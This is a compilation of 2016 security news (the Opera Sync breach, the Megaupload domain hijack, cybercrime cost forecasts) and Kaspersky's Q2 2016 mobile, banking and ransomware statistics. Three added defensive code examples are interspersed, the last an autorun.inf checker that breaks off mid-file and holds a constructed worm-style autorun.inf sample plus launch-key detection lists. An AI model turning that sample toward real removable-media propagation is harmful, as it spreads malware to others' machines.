“Abolhassan Firouzabadi, secretary of Iran’s Supreme National Cyberspace Council, says a team of experts will look at the possibility of cyberattacks as being a cause, Press TV reported on Sunday.

Special teams will be sent to the afflicted sites to study the possibility of cyber systems having a role in the recent fires, he said.” reported the Tehran Times.

Iranian cyber experts have spotted and removed two pieces of malware that infected systems at two petrochemical plants. The news was confirmed by a senior military official and reported by Venturebeat.com.

“Iran has detected and removed malicious software from two of its petrochemical complexes, a senior military official said on Saturday, after announcing last week it was investigating whether recent petrochemical fires were caused by cyber attacks.” reported by Venturebeat.com.

The official also added that the malware was not responsible for the incidents that occurred at the petrochemical complexes; the experts discovered that it was inactive and not linked to the fires.

“In periodical inspection of petrochemical units, a type of industrial malware was detected and the necessary defensive measures were taken,” Gholamreza Jalali, head of Iran’s civilian defense, told the state news agency IRNA.

“the discovery of this industrial virus is not related to recent fires.”

As declared by the oil minister, the string of fires in petrochemical complexes was caused by a lack of proper safety measures resulting from budget cuts made by firms in the energy sector.

Opera Browser Sync Service Hacked; Users' Data and Saved Passwords Compromised
28.8.2016 thehackernews Hacking
Opera has reset passwords of all users for one of its services after hackers were able to gain access to one of its Cloud servers this week.
Opera Software reported a security breach last night, which affects all users of the sync feature of its web browser.
So, if you’ve been using Opera’s Cloud Sync service, which allows users to synchronize their browser data and settings across multiple platforms, your passwords, login names and other sensitive data may have been compromised.
Opera confirmed its server breach on Friday, saying the "attack was quickly blocked" but that it believes "some data, including some of [their] sync users’ passwords and account information, such as login names, may have been compromised."
Opera has around 350 Million users across its range of products, but around 1.7 Million users of its Sync service had both their synchronized passwords and their authentication passwords leaked in the hack.
Since the company has already reset passwords of all of its registered Opera Sync users and emailed them with details, you need not worry about your account.
"Although we only store encrypted (for synchronized passwords) or hashed and salted (for authentication) passwords in this system, we have reset all the Opera sync account passwords as a precaution," Opera Software explained in a blog post.
Additionally, the company has also informed all Opera Sync users about the security breach and recommended that they change the passwords for their Opera Sync accounts as soon as possible. You can obtain a new password for Opera Sync using the password reset page.
The complete details about the intrusion and extent of the breach are yet unknown.
Opera Software encouraged users to reset passwords for any third party websites they may have synced with its service.
However, if you use the same password for multiple sites, you are also advised to change your passwords for those sites manually.
Since we’ve repeatedly seen people reusing passwords across multiple services in recent high-profile account hacks, you are advised to always use a good password manager to keep a strong, unique password for each of your online accounts.
We have listed some best password managers that would help you understand the importance of password managers and choose a suitable one according to your requirement.

Megaupload Domains Seized by FBI 'Hijacked' to Host Porn Ads
28.8.2016 thehackernews Hacking
Well, we all know that the FBI has previously hosted porn on the Internet. I still remember the case of PlayPen, the world's largest dark web child pornography site, which was seized by the FBI and run from the agency’s own servers to uncover the site's visitors.
Now, one of the most popular sites owned and operated by the FBI has been serving porn as well.
FBI-owned Megaupload.org and several other domains were allegedly serving up ads for "casual sex," "adult cam chat," "adult affair dating," and "live sex cams" and other 18+ entertainment.
Megaupload was once a highly popular site for pirated, copyrighted content that the agency seized from Kim Dotcom almost five years ago.
Since a criminal case against Dotcom is still pending in the United States, the FBI also retained control over several of the company’s assets, including cash, cars, and over a dozen of Megaupload’s former domain names, including Megastuff.co, Megaworld.mobi, Megaclicks.org, Megaupload.com, and Megavideo.com.
Initially, these Megaupload domains served a banner indicating that federal agents had seized them as part of a criminal investigation, but users who visited the site yesterday were surprised to see soft porn ads, offering links to adult entertainment.
But, How did this Happen?
'Lost control'
Yes, the hijacking of the Megaupload domains was not the result of some sophisticated hack that allowed hackers to serve you soft porn and sex ads; rather, the FBI had "lost control" of the domains in the same way it lost control last year.
TorrentFreak suggests the FBI forgot to renew an expired domain, CIRFU.NET, which the feds used for their "name server" to redirect traffic from sites it had seized, and that someone else simply purchased it and linked it to the Megaupload domains.
The Federal Bureau of Investigation fell into the same trap last year, when the web addresses it seized led people to sites peddling porn, fake security software, malware, adware and bogus special offers.
Though the federal authorities reportedly removed the nameservers altogether to fix the issue, the exact identity of who got control of Megaupload.org and its associated sites is not known. However, it is clear that the feds have not learned from their past mistakes.
The FBI has yet to comment on what happened to the domains.
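The failure mode here is a delegation that points at nameservers under a domain nobody renewed: whoever registers that domain next controls every zone delegated to it. Anyone operating seized, sinkholed or otherwise parked domains can audit for this. The following is an added example, not the FBI’s process or TorrentFreak’s material; the delegation table and the registration expiry dates are constructed placeholders standing in for zone data and whois results, and the registrable-domain rule (last two labels) is a simplification that real code would replace with the Public Suffix List.

```python
"""Audit NS delegations for nameservers whose parent domain is unregistered,
expired or about to expire.

Added example, not the FBI's or TorrentFreak's material. Both the delegation
table and the registration dates are constructed placeholders standing in
for zone data and whois expiry dates; the registrable-domain rule (last two
labels) is a simplification, real code would use the Public Suffix List.
"""
from datetime import date, timedelta

# Constructed: parked domains and the nameservers they are delegated to.
SAMPLE_DELEGATIONS = {
    "seized-example-1.org": ["ns1.sinkhole-example.net", "ns2.sinkhole-example.net"],
    "seized-example-2.com": ["ns1.sinkhole-example.net", "ns1.registrar-example.com"],
    "seized-example-3.mobi": ["ns1.registrar-example.com", "ns1.lapsed-example.net"],
}

# Constructed: registration expiry per registrable domain. A domain missing
# from this table (or mapped to None) is treated as not registered at all.
SAMPLE_REGISTRY = {
    "sinkhole-example.net": date(2016, 7, 1),
    "registrar-example.com": date(2019, 1, 1),
}


def registrable_domain(hostname):
    """Simplified: last two labels (assumption; wrong for suffixes like co.uk)."""
    return ".".join(hostname.rstrip(".").lower().split(".")[-2:])


def audit_delegations(delegations, registry, today, warn_days=60):
    """Return (zone, nameserver, parent_domain, status) for every nameserver
    whose parent domain someone else could register or which is close to
    lapsing. status is one of 'unregistered', 'expired', 'expiring'."""
    findings = []
    for zone, nameservers in delegations.items():
        for ns in nameservers:
            parent = registrable_domain(ns)
            expiry = registry.get(parent)
            if expiry is None:
                status = "unregistered"
            elif expiry < today:
                status = "expired"
            elif expiry - today <= timedelta(days=warn_days):
                status = "expiring"
            else:
                continue
            findings.append((zone, ns, parent, status))
    return findings


def zones_at_risk(delegations, registry, today, warn_days=60):
    """Zones where *every* nameserver is at risk: a takeover of the parent
    domain would hand the whole zone to whoever registers it."""
    flagged = {}
    for zone, ns, _, _ in audit_delegations(delegations, registry, today, warn_days):
        flagged.setdefault(zone, set()).add(ns)
    return sorted(z for z, bad in flagged.items() if bad == set(delegations[z]))


if __name__ == "__main__":
    today = date(2016, 8, 27)   # constructed "now"
    for finding in audit_delegations(SAMPLE_DELEGATIONS, SAMPLE_REGISTRY, today):
        print("%-22s -> %-28s (%s: %s)" % finding)
    print("fully exposed zones:", zones_at_risk(SAMPLE_DELEGATIONS, SAMPLE_REGISTRY, today))
```

A zone with one healthy nameserver left is still worth fixing, since resolvers pick among all listed nameservers, but a zone whose nameservers all sit under a lapsed domain is the case that produces exactly the redirect described in the article.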

Global cost of cybercrime will grow from $3 trillion in 2015 to $6 trillion annually by 2021
28.8.2016 securityaffairs Crime
The cost of cybercrime could reach $6 trillion by 2021 (global annual cybercrime costs were estimated at $3 trillion in 2015).
The global cost of cybercrime continues to increase, which is no surprise given the intensification of this kind of illegal activity. According to an analysis conducted by Cybersecurity Ventures, the cost of cybercrime could reach $6 trillion by 2021 (global annual cybercrime costs were estimated at $3 trillion in 2015).

Security experts question how much the cost of cybercrime will actually grow over the next five years; a trillion dollars plus is a worrying trend, but it is possible, as explained by Larry Ponemon, founder of the Ponemon Institute.

“a trillion dollars plus is a real possibility,” commented Larry Ponemon. “If you asked me five or six years ago, I’d fall over,”

The growth of the cybercrime activities will force an increase in the global spending on cyber security products and services. Global spending is expected to exceed $1 trillion cumulatively over the next five years, from 2017 to 2021.

Criminal activities will evolve from targeting computers and mobile devices to targeting IoT, transportation, and power grids.

The cybercrime cost evaluated by the researchers takes into account all possible damages associated with cybercrime activities including:

damage and destruction of data, stolen money.
theft of intellectual property.
theft of personal and financial data, embezzlement.
lost productivity.
reputational harm.
post-attack disruption to the normal course of business, forensic investigation.
restoration and deletion of hacked data and systems.
We have also to consider that a significant portion of the overall cost of cybercrime is not calculated due to unreported crimes.

The report highlights the lack of an effective law enforcement agency for financial cybercrime today. Despite the recent successes of law enforcement against criminal organizations worldwide, a supplementary effort against the growing threats is necessary.

The U.S. has declared a national emergency to deal with cyber threats; small businesses are the most exposed to them.

“The world’s cyber attack surface will grow an order of magnitude larger between now and 2021.” states the report.

IT threat evolution in Q2 2016. Statistics
28.8.2016 Kaspersky Security

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Q2 figures

According to KSN data, Kaspersky Lab solutions detected and repelled 171,895,830 malicious attacks from online resources located in 191 countries all over the world.
54,539,948 unique URLs were recognized as malicious by web antivirus components.
Kaspersky Lab’s web antivirus detected 16,119,489 unique malicious objects: scripts, exploits, executable files, etc.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 1,132,031 user computers.
Crypto ransomware attacks were blocked on 311,590 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 249,619,379 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected:
3,626,458 malicious installation packages;
27,403 mobile banker Trojans (installation packages);
83,048 mobile ransomware Trojans (installation packages).
Mobile threats

In Q2 2016, Kaspersky Lab detected 3,626,458 malicious installation packages – 1.7 times more than in the previous quarter.

Number of detected malicious installation packages (Q3 2015 – Q2 2016)

Distribution of mobile malware by type

As of this quarter, we will calculate the distribution of mobile malware by type based on the number of detected malicious installation packages rather than modifications, as was the case in earlier reports.

Distribution of new mobile malware by type (Q1 2016 and Q2 2016)

In Q2 2016, RiskTool software, or legal applications that are potentially dangerous to users, topped the ranking of detected malicious objects for mobile devices. Their share increased from 31.6% in Q1 to 45.1% this quarter.

Adware occupies second place. The share of these programs fell 1.4 p.p. compared to the previous quarter, and accounted for 14.2%.

The share of SMS Trojans fell from 18.5% to 10.8%, pushing this category of malicious programs down from second to third place in the ranking. Trojan-SMS.AndroidOS.Agent.qu and Trojan-SMS.AndroidOS.Agent.f accounted for most of the detected SMS Trojans, with both accounting for approximately 30% of all malicious files in this category.

The Trojan-Dropper share also fell – from 14.5% in Q1 to 9.2%. Trojan-Dropper.AndroidOS.Agent.v led the way: we detected more than 50,000 installation packages related to this Trojan.

TOP 20 mobile malware programs

Please note that this ranking of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacked users*
1 DangerousObject.Multi.Generic 80.87
2 Trojan.AndroidOS.Iop.c 11.38
3 Trojan.AndroidOS.Agent.gm 7.71
4 Trojan-Ransom.AndroidOS.Fusob.h 6.59
5 Backdoor.AndroidOS.Ztorg.a 5.79
6 Backdoor.AndroidOS.Ztorg.c 4.84
7 Trojan-Ransom.AndroidOS.Fusob.pac 4.41
8 Trojan.AndroidOS.Iop.t 4.37
9 Trojan-Dropper.AndroidOS.Gorpo.b 4.3
10 Trojan.AndroidOS.Ztorg.a 4.30
11 Trojan.AndroidOS.Ztorg.i 4.25
12 Trojan.AndroidOS.Iop.ag 4.00
13 Trojan-Dropper.AndroidOS.Triada.d 3.10
14 Trojan-Dropper.AndroidOS.Rootnik.f 3.07
15 Trojan.AndroidOS.Hiddad.v 3.03
16 Trojan-Dropper.AndroidOS.Rootnik.h 2.94
17 Trojan.AndroidOS.Iop.o 2.91
18 Trojan.AndroidOS.Rootnik.ab 2.91
19 Trojan.AndroidOS.Triada.e 2.85
20 Trojan-SMS.AndroidOS.Podec.a 2.83
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place is occupied by DangerousObject.Multi.Generic (80.87%), the classification used for malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

As in the previous quarter, 16 Trojans that use advertising as their main means of monetization (highlighted in blue in the table) made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from where they are very difficult to delete.

Trojan.AndroidOS.Iop.c (11.38%) moved from third to second in the TOP 20 and became the single most popular malicious program of the quarter. Over the reporting period we detected this Trojan in 180 countries, but the majority of attacked users were in Russia, India and Algeria. Iop.c can exploit a variety of vulnerabilities in the system to gain superuser privileges. The main method of monetization is displaying advertising and installing (usually secretly) various programs on the user’s device, including other malicious programs.

Representatives of the Trojan-Ransom.AndroidOS.Fusob ransomware family claimed fourth and seventh places. These Trojans demand a ransom of $100-200 from victims to unblock their devices. Attacks using this Trojan were registered in over 120 countries worldwide in Q2, with a substantial number of victims located in Germany and the US.

Trojan-SMS.AndroidOS.Podec.a (2.83%) has now spent over a year in the mobile malware TOP 20, although it is starting to lose ground. It used to be a permanent fixture in the TOP 5 mobile threats, but for the second quarter in a row it has only made it into the bottom half of the ranking. Its functionality has remained practically unchanged; its main means of monetization is subscribing users to paid services.

The geography of mobile threats

The geography of attempted mobile malware infections in Q2 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked **
1 China 36.31
2 Bangladesh 32.66
3 Nepal 30.61
4 Uzbekistan 22.43
5 Algeria 22.16
6 Nigeria 21.84
7 India 21.64
8 Indonesia 21.35
9 Pakistan 19.49
10 Iran 19.19
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

China topped the ranking, with more than 36% of users there encountering a mobile threat at least once during the quarter. China also came first in this ranking in Q1 2016.

In all the countries of this ranking, except China, the most popular mobile malware was the same – advertising Trojans that appeared in the TOP 20 mobile malware, and AdWare. The most popular malicious program was Trojan.AndroidOS.Iop.c. In China, a significant proportion of attacks also involved advertising Trojans, but the majority of users there encountered the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families, while Trojan.AndroidOS.Iop.c only occupied sixteenth place.

Russia (10.4%) was 26th in this ranking, Germany (8.5%) 38th, Italy (6.2%) 49th, and France (5.9%) 52nd. The US (5.0%) came 59th and the UK (4.6%) 64th.

The safest countries were Austria (3.6%), Sweden (2.9%) and Japan (1.7%).

Mobile banking Trojans

As of this quarter, we calculate the distribution of mobile malware by type based on the number of detected malicious installation packages rather than modifications, as was the case in earlier reports. Over the reporting period, we detected 27,403 mobile banking Trojan installation packages, 1.2 times fewer than in Q1.

Number of mobile banking Trojans detected by Kaspersky Lab solutions (Q3 2015 – Q2 2016)

The TOP 5 most popular mobile banking Trojans in Q2 consisted of representatives from just two families – Trojan-Banker.AndroidOS.Asacub and Trojan-Banker.AndroidOS.Svpeng.

Trojan-Banker.AndroidOS.Asacub.i was the most popular mobile banking Trojan of the quarter. It uses different methods to trick users and bypass system constraints. In Q1 we identified a modification of this mobile Trojan that overlaid the regular system window requesting device administrator privileges with its own window containing buttons. The Trojan thereby conceals the fact that it is gaining elevated privileges in the system from the user, and tricks the user into approving these privileges. In Q2, we detected a modification that requested the user’s permission to become the main SMS application.

Dialog window of Trojan-Banker.AndroidOS.Asacub.i asking for the user’s approval to become the main SMS application

Since Android 4.4 (KitKat), only the default SMS application can intercept incoming messages and write to the SMS database; other apps can merely observe them. By becoming the default SMS app the Trojan regains that ability and can hide incoming SMSs from the user (as a rule, messages from banks and payment systems). To persuade users to set the malicious program as the default SMS application, the Trojan authors had to, among other things, implement a messenger interface.

The Trojan-Banker.AndroidOS.Asacub.i interface used to create and send messages

Asacub is actively distributed via SMS spam.
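
A triage check that follows from the default-SMS-app point above, added here as an example (it is not part of the Kaspersky report and not Asacub code): on a device you suspect, read the default SMS handler from Android's secure settings and see whether it is a known messaging app or a sideloaded package. The allowlist, the verdict names and the constructed `adb` output are mine; the `run_adb` wrapper assumes `adb` is on the PATH and a single device is attached.

```python
"""Triage the default SMS handler on an Android 4.4+ device.

Added example, not from the report. Reads Settings.Secure
'sms_default_application' and the install path of that package,
then classifies the result. Sample command outputs are constructed."""
import subprocess

# Hypothetical allowlist: stock messaging apps a practitioner would expect.
KNOWN_SMS_APPS = {
    "com.google.android.apps.messaging",   # Google Messages
    "com.android.mms",                     # AOSP Messaging
    "com.samsung.android.messaging",       # Samsung Messages
}
# APK locations that indicate the app shipped with the firmware.
PREINSTALLED_PREFIXES = ("/system/", "/system_ext/", "/product/", "/vendor/", "/apex/")

# Constructed output of the two adb commands, for the demo and the tests.
SAMPLE_SETTING = "com.example.chat\n"
SAMPLE_PM_PATH = "package:/data/app/com.example.chat-1/base.apk\n"


def run_adb(*args, serial=None):
    """Run 'adb shell <args>' and return stdout; assumes adb is on PATH."""
    cmd = ["adb"] + (["-s", serial] if serial else []) + ["shell", *args]
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


def parse_pm_path(output):
    """'pm path <pkg>' prints one 'package:/path/x.apk' line per APK split."""
    return [line.split(":", 1)[1].strip()
            for line in output.splitlines() if line.startswith("package:")]


def classify_location(apk_paths):
    """Where the APK lives tells you whether a user (or malware) installed it."""
    if not apk_paths:
        return "not-installed"
    if any(p.startswith(PREINSTALLED_PREFIXES) for p in apk_paths):
        return "preinstalled"
    if any(p.startswith("/data/app/") for p in apk_paths):
        return "user-installed"
    return "unknown"


def triage_default_sms(setting_output, pm_path_output, known=KNOWN_SMS_APPS):
    """Combine the 'settings get' and 'pm path' outputs into a verdict dict."""
    pkg = setting_output.strip()
    if pkg in ("", "null"):            # no default SMS app set on this device
        return {"package": None, "location": None, "verdict": "unset"}
    location = classify_location(parse_pm_path(pm_path_output))
    if pkg in known:
        verdict = "expected"
    elif location == "user-installed":
        verdict = "review"             # a sideloaded/unknown app owns the SMS role
    elif location == "preinstalled":
        verdict = "unknown-preinstalled"   # OEM app: confirm against the vendor image
    else:
        verdict = "unknown"
    return {"package": pkg, "location": location, "verdict": verdict}


if __name__ == "__main__":
    print("constructed sample:", triage_default_sms(SAMPLE_SETTING, SAMPLE_PM_PATH))
    try:
        setting = run_adb("settings", "get", "secure", "sms_default_application")
        pkg = setting.strip()
        paths = run_adb("pm", "path", pkg) if pkg not in ("", "null") else ""
        print("attached device:", triage_default_sms(setting, paths))
    except (FileNotFoundError, subprocess.CalledProcessError) as exc:
        print("no device/adb available:", exc)
```

The allowlist is consulted before the install location because stock apps updated through the store also report a `/data/app/` path; a "review" verdict therefore means an unrecognised package holds the SMS role, which is exactly the state Asacub needs, not that the package is necessarily malicious.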

Russia and Germany lead in terms of the number of users attacked by mobile banking Trojans:

Geography of mobile banking threats in Q2 2016 (percentage of all users attacked)

The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we created a country ranking according to the percentage of users attacked by mobile banker Trojans.

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked**
1 Russia 1.51
2 Australia 0.73
3 Uzbekistan 0.45
4 Korea 0.35
5 China 0.34
6 Ukraine 0.33
7 Denmark 0.28
8 Germany 0.24
9 Turkey 0.23
10 Kyrgyzstan 0.17
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q2 2016, first place was occupied by Russia (1.51%) where the majority of affected users encountered the Trojan-Banker.AndroidOS.Asacub, Trojan-Banker.AndroidOS.Svpeng and Trojan-Banker.AndroidOS.Faketoken families of mobile banker Trojans.

China, last quarter’s leader, fell to fifth place this quarter.

In second place again was Australia where the Trojan-Banker.AndroidOS.Acecard family was replaced by the Trojan-Banker.AndroidOS.Marcher family as the most popular threat.

Banking Trojans were especially popular with attackers in Russia and Australia. The percentage of users attacked by this malware in the two countries relative to all attacked users accounted for 14%.

Mobile Trojan-Ransomware

As of this quarter, we will calculate the distribution of mobile malware by type based on the number of detected malicious installation packages rather than modifications, as was the case in earlier reports.

In Q2 2016, we detected 83,048 mobile Trojan-Ransomware installation packages, which is about the same number as the previous quarter and seven times more than in Q4 2015.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q3 2015 – Q2 2016)

The sharp rise in the number of mobile Trojan-Ransomware installation packages in 2016 was caused by the active proliferation of the Trojan-Ransom.AndroidOS.Fusob family of Trojans. In the first quarter of 2016, this family accounted for 96% of users attacked by mobile ransomware. In Q2 its share was 85%.

Trojan-Ransom.AndroidOS.Fusob.h became the most popular mobile Trojan-Ransomware in the second quarter – it accounted for nearly 60% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including the GPS coordinates and call history, and downloads the data to a malicious server. After that, it may get a command to block the device. In the second quarter we registered a growth in the number of installation packages related to Trojan-Ransom.AndroidOS.Congur.b: their share grew from 0.8% to 8.8%. This Trojan, targeting Chinese-speaking users, changes the system password (PIN), or installs it if no password was installed earlier, thus making it impossible to use the device. The notification containing the ransom demand is displayed on the screen of the blocked device.

Germany, the US and Russia had the highest number of users attacked by Trojan-Ransomware this quarter:

Geography of mobile Trojan-Ransomware in Q2 2016 (percentage of all users attacked)

To assess the risk of mobile Trojan-Ransomware infection in each country, and to compare it across countries, we created a country ranking according to the percentage of users attacked by mobile Trojan-Ransomware.

TOP 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked**
1 Canada 2.01
2 Germany 1.89
3 US 1.66
4 Switzerland 1.63
5 Mexico 1.55
6 UK 1.51
7 Denmark 1.35
8 Italy 1.35
9 Kazakhstan 1.35
10 Netherlands 1.15
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

In all the countries of the TOP 10, except for Kazakhstan, the most popular Trojan-Ransom family was Fusob. In the US, the Trojan-Ransom.AndroidOS.Svpeng family was also popular. These Trojans demand a ransom of $100-500 from victims to unblock their devices.

In Kazakhstan and Uzbekistan, the main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demanding $10 to unblock it.

Vulnerable applications exploited by cybercriminals

In Q2 2016, exploits for Adobe Flash Player remained popular. During the reporting period two new vulnerabilities were discovered in this software:

An exploit for CVE-2016-4117 was added to the Magnitude and Neutrino exploit kits. The CVE-2016-4171 vulnerability was used by the ScarCruft group to carry out targeted attacks. We wrote a more detailed account of this group’s activities in a blog published in mid-June.

The main event this quarter was the demise of the long-term market leaders – the Angler and Nuclear exploit kits. Angler’s departure resulted in market players shifting to other kits to distribute malware. In particular, we registered a dramatic growth in the popularity of the Neutrino exploit kit.

This is how the overall picture for the use of exploits in the second quarter looks:


Distribution of exploits used in attacks by the type of application attacked, Q2 2016

The chart shows that despite the exit of the market leaders the breakdown of exploits was almost unchanged from the previous quarter: the proportion of exploits for Microsoft Office (14%) and Java (7%) fell by 1 p.p., while the share for Android grew 2 p.p. and reached 24%. This suggests that demand for exploit kits has been spread among the remaining players: RIG, Magnitude and Neutrino. The latter was the undisputed leader this quarter in terms of the number of attempts to download malware.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

In the second quarter of 2016, Kaspersky Lab’s web antivirus detected 16,119,489 unique malicious objects: scripts, exploits, executable files, etc. 54,539,948 unique URLs were recognized as malicious by web antivirus components.

Online threats in the banking sector

These statistics are based on the detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

Number of users attacked by malware targeting finances

Due to the constant emergence of new representatives of banking Trojans and functional changes in existing banking Trojans, in the second quarter of 2016 we have significantly updated the list of verdicts classed as banking risks. This means the number of financial malware victims has changed significantly compared to the data published in previous quarters. As a comparison, we have recalculated the statistics for the previous quarter, taking into account all the malware from the updated list.

Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 1,132,031 computers in Q2 2016. The quarter saw an increase in financial malware activity: the figure for Q2 is 15.6% higher than that for the previous quarter (979,607).

Number of users attacked by malware targeting finances, Q2 2016

Geography of attack

To evaluate and compare the risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this type of threat during the reporting period in the country, relative to all users of our products in the country.

Geography of banking malware attacks in Q2 2016 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users**
1 Turkey 3.45
2 Russia 2.92
3 Brazil 2.63
4 Pakistan 2.60
5 Venezuela 1.66
6 Tunisia 1.62
7 Japan 1.61
8 Singapore 1.58
9 Libya 1.57
10 Argentina 1.48
These statistics are based on the detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

The highest percentage of Kaspersky Lab users attacked by banking Trojans was in Turkey. One of the reasons for the growth in financial threats there was a burst of activity by the Gozi banking Trojan whose developers have joined forces with the creators of the Nymaim Trojan.

In Russia, 2.92% of users encountered a banking Trojan at least once in Q2, placing it second in this ranking.

Brazil rounds off the top three. We expect a surge in financial threats in Latin America in the next quarter due to the Olympic Games in Brazil. This event is just too tempting for cybercriminals to ignore – they regularly use the theme of major sporting events in their attacks to lure potential victims.

The top five countries where users were least affected by banking Trojans were Canada (0.33%), the US (0.4%), the UK (0.4%), France (0.43%) and the Netherlands (0.5%).

The percentage of banking Trojan victims in Italy was 0.62%, in Spain it was 0.83%, while in Germany the figure was 1.03%.

The TOP 10 banking malware families

The table below shows the top 10 malware families most commonly used in Q2 2016 to attack online banking users (as a percentage of users attacked):

Name* Percentage of users attacked**
1 Trojan-Spy.Win32.Zbot 15.72
2 Trojan-Banker.Win32.Gozi 3.28
3 Trojan.Win32.Qhost 2.35
4 Trojan-Banker.Win32.Shiotob 2.27
5 Trojan-Banker.Win32.BestaFera 2.12
6 Trojan.Win32.Nymaim 1.98
7 Trojan-Banker.Win32.ChePro 1.90
8 Trojan-Banker.Win32.Banbra 1.77
9 Trojan.Win32.Neurevt 0.67
10 Backdoor.Win32.Shiz 0.66
* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

Trojan-Spy.Win32.Zbot in first place is a permanent fixture in the leading positions of this ranking, and it is no coincidence: the source codes of this Trojan became publicly available back in 2012. This has resulted in the emergence of new banking Trojans that have adopted fragments of the Zbot code.

The second quarter of 2016 saw a surge in malicious activity by Trojan.Win32.Nymaim. As a result, this Trojan made it into the top 10 for the first time, going straight in at sixth place. Nymaim was initially designed to block access to valuable data and then demand a ransom (ransomware) to unblock it, but the latest version now also includes banking Trojan functionality for stealing financial information. This can be explained by the fact that the creators of Nymaim and Gozi (which also appears in the Q2 TOP 10 financial risks) have joined forces. Nymaim’s source code now includes fragments of Gozi code that provide attackers with remote access to infected computers.

A permanent resident in this ranking, and one of the reasons financial threats are so prominent in Brazil, is the Trojan-Banker.Win32.ChePro family. This banking malware lets cybercriminals take screenshots, log keystrokes and read the contents of the clipboard, i.e., it possesses functionality capable of attacking almost any online banking system. The criminals keep implementing new techniques to avoid detection for as long as possible: some of the Trojans from this family use geolocation, or query the system for the time zone and the Windows version, in order to infect users only in a particular region.

Yet another newcomer to the top 10 most active financial threats in Q2 was the Trojan.Win32.Neurevt family. Representatives of this family were first discovered in 2013 and are used by cybercriminals not only to steal user payment data in online banking systems but also to send out spam (some versions, for example, sent spam messages on Skype) and implement DDoS attacks (with the addition of functionality capable of performing the Slowloris HTTP flooding scenario).

Ransomware Trojans

The overall number of cryptor modifications in our virus collection to date is approximately 26,000. A total of 28 new cryptor families and 9,296 new modifications were detected in Q2.

The following graph shows the rise in the number of newly created cryptor modifications over the last two quarters.

Number of Trojan-Ransom cryptor modifications (Q1 2016 vs Q2 2016)

Some of the more high-profile or unusual Trojans detected in Q2 2016 are listed below:

CryptXXX (Trojan-Ransom.Win32.CryptXXX)

This cryptor has been widely distributed via exploit kits since April 2016. Its earlier versions contained gaps in the file encryption algorithm which allowed Kaspersky Lab to release a utility to decrypt them. Unfortunately, the attackers have made adjustments to subsequent versions, making it impossible to decrypt the files affected by later CryptXXX modifications.

ZCryptor (Trojan-Ransom.MSIL.Zcryptor)

This malware combines cryptor functionality and a worm distribution method. Trojan ransomware does not usually include tools for self-propagation, and ZCryptor just happens to be an exception to this rule. Like a classic worm, while infecting, it creates copies of its body on removable media and generates the autorun.inf file to implement the automatic launch of its executable file once the media is connected to another system (if, of course, autorun is not disabled).
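
To check a removable drive for exactly this propagation mechanism, here is an added example (mine, not ZCryptor or Kaspersky code) that parses autorun.inf, extracts the entries Windows would execute on insertion, and scores them by whether the referenced file actually exists on the volume. The two sample autorun.inf texts and the file name `sys\invoice.exe` are constructed for the demo.

```python
"""Flag autorun.inf files on removable media that would launch an executable
when the drive is connected (the worm trick described for ZCryptor).

Added example, not ZCryptor or vendor code. The sample .inf contents and the
file names in them are constructed for the demonstration."""
import configparser
from pathlib import Path, PureWindowsPath

# File types Windows will execute directly when named in an autorun.inf.
EXEC_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".vbs", ".js"}
# [autorun] keys that cause code execution (icon/label/action only affect the dialog).
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")

# Constructed samples: a worm-style autorun.inf and a harmless one.
SAMPLE_MALICIOUS = r"""[autorun]
open=sys\invoice.exe /autorun
shellexecute=sys\invoice.exe
action=Open folder to view files
icon=%SystemRoot%\system32\shell32.dll,4
"""
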